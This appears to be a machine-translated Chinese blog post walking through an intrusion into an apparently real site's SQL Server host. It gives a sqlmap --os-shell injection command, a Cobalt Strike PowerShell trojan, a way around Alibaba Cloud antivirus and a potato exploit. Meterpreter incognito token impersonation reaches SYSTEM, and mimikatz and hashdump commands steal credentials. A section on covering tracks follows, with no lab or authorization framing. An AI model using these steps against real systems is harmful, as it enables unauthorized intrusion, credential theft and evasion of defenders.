当前位置:网站首页>Penetration practice - sqlserver empowerment
Penetration practice - sqlserver empowerment
2022-07-04 03:43:00 【amingMM】
Technical point :
Yundun dodges
cs / msf Go online with
0x00 Manage premise
BC standing Login screen 
sqlmap Run straight sql Blind note
sqlmap -u "http://127.0.0.1/Login/index " --form --batch --os-shell
os-shell
0x01 go online CS
Cobalt Strike
● Create a listener 
Generate a Powershell command Of Trojans
Throw it to the one just now shell Go inside the command line 
● View permissions
Current shell jurisdiction , Only nt service\mssqlserver, Very low authority 
0x02 Raise the right
● Check out the patches
Installed 154 A patch
Patches : Installed 154 A patch .
[01]: KB2959936
[02]: KB3191564
[03]: KB2896496
[04]: KB2919355
[05]: KB2920189
[06]: KB2928120
[07]: KB2931358
[08]: KB2931366
[09]: KB2933826
[10]: KB2938066
[11]: KB2938772
[12]: KB2949621
[13]: KB2954879
[14]: KB2958262
[15]: KB2958263
[16]: KB2961072
[17]: KB2965500
[18]: KB2966407
[19]: KB2967917
[20]: KB2971203
[21]: KB2971850
[22]: KB2973351
[23]: KB2973448
[24]: KB2975061
[25]: KB2976627
[26]: KB2977629
[27]: KB2981580
[28]: KB2987107
[29]: KB2989647
[30]: KB2989930
[31]: KB2998527
[32]: KB3000850
[33]: KB3003057
[34]: KB3004545
[35]: KB3008242
[36]: KB3011780
[37]: KB3012702
[38]: KB3013172
[39]: KB3013410
[40]: KB3013538
[41]: KB3013769
[42]: KB3013791
[43]: KB3013816
[44]: KB3014442
[45]: KB3019978
[46]: KB3021674
[47]: KB3023266
[48]: KB3024751
[49]: KB3024755
[50]: KB3027209
[51]: KB3030947
[52]: KB3031044
[53]: KB3033446
[54]: KB3034348
[55]: KB3035126
[56]: KB3036612
[57]: KB3038002
[58]: KB3042058
[59]: KB3042085
[60]: KB3043812
[61]: KB3044374
[62]: KB3044673
[63]: KB3045634
[64]: KB3045685
[65]: KB3045717
[66]: KB3045719
[67]: KB3045755
[68]: KB3045999
[69]: KB3046017
[70]: KB3046737
[71]: KB3048043
[72]: KB3054169
[73]: KB3054203
[74]: KB3054256
[75]: KB3054464
[76]: KB3055323
[77]: KB3055343
[78]: KB3055642
[79]: KB3059317
[80]: KB3060681
[81]: KB3060793
[82]: KB3061512
[83]: KB3063843
[84]: KB3071756
[85]: KB3077715
[86]: KB3078405
[87]: KB3078676
[88]: KB3080149
[89]: KB3081320
[90]: KB3082089
[91]: KB3084135
[92]: KB3084905
[93]: KB3086255
[94]: KB3087137
[95]: KB3091297
[96]: KB3092601
[97]: KB3092627
[98]: KB3094486
[99]: KB3095701
[100]: KB3099834
[101]: KB3100473
[102]: KB3102429
[103]: KB3102939
[104]: KB3103616
[105]: KB3103696
[106]: KB3103709
[107]: KB3109103
[108]: KB3109976
[109]: KB3110329
[110]: KB3115224
[111]: KB3121261
[112]: KB3123245
[113]: KB3126041
[114]: KB3126434
[115]: KB3126587
[116]: KB3126593
[117]: KB3132080
[118]: KB3133043
[119]: KB3133690
[120]: KB3134179
[121]: KB3134815
[122]: KB3137728
[123]: KB3138602
[124]: KB3139164
[125]: KB3139398
[126]: KB3139914
[127]: KB3140219
[128]: KB3140234
[129]: KB3144850
[130]: KB3145384
[131]: KB3145432
[132]: KB3146604
[133]: KB3146723
[134]: KB3146751
[135]: KB3147071
[136]: KB3149157
[137]: KB3155784
[138]: KB3156059
[139]: KB3159398
[140]: KB3161949
[141]: KB3162343
[142]: KB3172614
[143]: KB3172729
[144]: KB3175024
[145]: KB3178539
[146]: KB3179574
[147]: KB3185319
[148]: KB4033428
[149]: KB4483187
[150]: KB4486105
[151]: KB4486107
[152]: KB5001403
[153]: KB5007154
[154]: KB5008263
network card : Installed 1 individual NIC.
[01]: Red Hat VirtIO Ethernet Adapter
Connection name : Ethernet
Enable DHCP: yes
Use ms16-075 try 
see AV
https://mrxn.net/avlist/
Alibaba cloud shield
0x03 Transition msf
● newly build payload
choice Foreign HTTP
stay msf Upper use
● CS New session
Select your session to derive the session
stay msf Wait until the session is connected ( Be careful : It seems that the session cannot be derived from the domain prefix )
Permission is still very low , stay CS It uses file browsing to upload rotten potatoes
● In the current session , Right to start :
cd C:\\Users\\Public
use incognito
execute -cH -f ./potato.exe
list_tokens -u
Copy administrator The token
impersonate_token "administrator The token "
Got it system jurisdiction
0x04 Grab Hash
load mimikatz
creds_all
Use msf Self contained :run post/windows/gather/smart_hashdump
Direct login
0x05 Clean up traces
边栏推荐
- 新型数据中心,助力加快构建以数据为关键要素的数字经济
- SQL statement strengthening exercise (MySQL 8.0 as an example)
- Management and thesis of job management system based on SSM
- Es network layer
- [Valentine's Day confession code] - Valentine's Day is approaching, and more than 10 romantic love effects are given to the one you love
- If you have just joined a new company, don't be fired because of your mistakes
- [paddleseg source code reading] paddleseg calculation dice
- MySQL is dirty
- Select sorting and bubble sorting template
- Rhcsa day 3
猜你喜欢
三菱M70宏变量读取三菱M80公共变量采集三菱CNC变量读取采集三菱CNC远程刀补三菱机床在线刀补三菱数控在线测量
What are the virtual machine software? What are their respective functions?
JVM family -- heap analysis
Audio and video technology development weekly | 232
Cache general management class + cache httpcontext Current. Cache and httpruntime Differences between caches
MySQL query
National standard gb28181 protocol platform easygbs fails to start after replacing MySQL database. How to deal with it?
选择排序与冒泡排序模板
Mindmanager2022 efficient and easy to use office mind map MindManager
Objective-C description method and type method
随机推荐
CesiumJS 2022^ 源码解读[0] - 文章目录与源码工程结构
Zigzag scan
智慧地铁| 云计算为城市地铁交通注入智慧
Stm32bug [stlink forced update prompt appears in keilmdk, but it cannot be updated]
Rhcsa day 3
SQL statement strengthening exercise (MySQL 8.0 as an example)
投资深度思考
Nbear introduction and use diagram
[.NET + mqtt]. Mise en œuvre de la communication mqtt dans l'environnement net 6 et démonstration de code pour l'abonnement et la publication de messages bilatéraux du serveur et du client
潘多拉 IOT 开发板学习(HAL 库)—— 实验6 独立看门狗实验(学习笔记)
[database I] database overview, common commands, view the table structure of 'demo data', simple query, condition query, sorting data, data processing function (single row processing function), groupi
@Scheduled scheduled tasks
Learning video website
How much does it cost to open a futures account in China? Where is it safe to open an account at present?
What is the difference between enterprise wechat applet and wechat applet
JSON string conversion in unity
Handler source code analysis
Zhihu million hot discussion: why can we only rely on job hopping for salary increase? Bosses would rather hire outsiders with a high salary than get a raise?
How to pipe several commands in Go?
Add token validation in swagger